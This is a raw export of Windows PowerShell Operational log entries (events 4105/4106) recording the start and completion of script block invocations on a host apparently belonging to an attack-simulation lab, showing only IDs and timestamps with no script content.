SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477071
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477070
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477068
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477067
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477066
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477065
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477064
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477063
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477062
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477061
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477060
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477059
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477058
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477057
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477056
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477055
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477054
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477053
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477052
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477051
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477050
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477049
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477048
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477046
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477045
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477044
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477043
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477042
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477041
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477040
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477039
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477038
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477037
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477036
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477035
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477034
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477032
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477031
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477030
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477029
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477028
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477027
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477026
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477025
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477024
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477023
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477022
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477021
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477020
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477018
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477017
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477016
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
